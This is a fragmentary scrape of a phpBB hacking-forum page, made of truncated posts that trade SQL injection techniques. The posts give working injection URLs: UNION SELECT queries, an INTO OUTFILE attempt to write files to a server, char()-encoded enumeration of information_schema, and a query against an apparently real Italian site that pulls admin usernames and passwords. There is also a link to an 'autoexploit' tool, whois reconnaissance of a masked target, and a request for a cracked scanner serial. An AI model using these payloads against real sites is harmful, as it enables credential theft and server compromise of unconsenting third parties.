|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
http://itlangson.net/diendan/userpix/3_aep1_1.jpg
Autoexploit SQL Inject in PHP
http://www.mediafire.com/?mzojvnllly9 |
|
|
|
|
or try using convert()
http://site.com/news/?year=2+union+all+select+1,2,3,4,5,convert(@@version+using+latin1),7,8,9--+ |
|
|
|
|
Try without concat.
i try, but
As far as i know, INTO OUTFILE wants simple text string as file path! No concat, no "0x1122330", no HEX, no UNHEX, etc ...
And if php has "magic_quotes=on" (m ... |
|
|
|
|
http://www.******.com/news.php?nid=-2013+union+select+1,2,3,4,5,6,7,8,9,10,11+into+outfile+concat(char(67,58,92,65,112,112,83,101,114,118,92,119,119,119,92,116,101,115,116,[...]116))/*
and has erro ... |
|
|
|
|
8eaaecfcd9e09f9627e33d73ff2f265d
thank you! |
|
|
|
|
MediaFire's uploads and downloads will be sporadically offline from ~6 AM to ~9:30 AM CT for database maintenance.
now link live againt |
|
|
|
|
http://whois.domaintools.com/********.org
Dedicated Hosting: ********.org is hosted on a dedicated server.
Name Server:NS2.********.COM
Name Server:NS1.********.COM
Target: upload file
htt ... |
|
|
|
|
try with char ascii
&id=-1+UNION+ALL+SELECT+COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=concat(char(108),char(103),char(95),char(117),char(115),char(101),char(114),char(115))+A ... |
|
|
|
|
sometime to exploit, we have problem with char ascii, i found this tool maybe make easy when attack
http://itlangson.net/diendan/userpix/3_sql1_1.jpg
http://itlangson.net/diendan/userpix/3_sql2_ ... |
|
|
|
|
i should setup in your pc a ms-sql server, to remote another server, Run SQL Server Enterprise Manager --> New Server Registration. |
|
|
Forum:Tools Posted: Thu Dec 01, 2005 10:33 am Subject: n |
|
|
onbiew |
|
Replies: 7 |
Views: 17422 |
|
|
|
|
|
|
yes, i can`t find serial number
now have Acunetix Web Vulnerability Scanner 3, but trial version |
|
|
|
onbiew |
|
Replies: 7 |
Views: 17699 |
|
|
|
|
|
|
http://www.cooplameridiana.it/download/catinfo.asp?cat='%20union%20select%20null,null,user,null,null,null,null,null,pass,null,null,null,null,null%20FROM%20tblAdm%20'
result:
Contenuti della cate ... |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|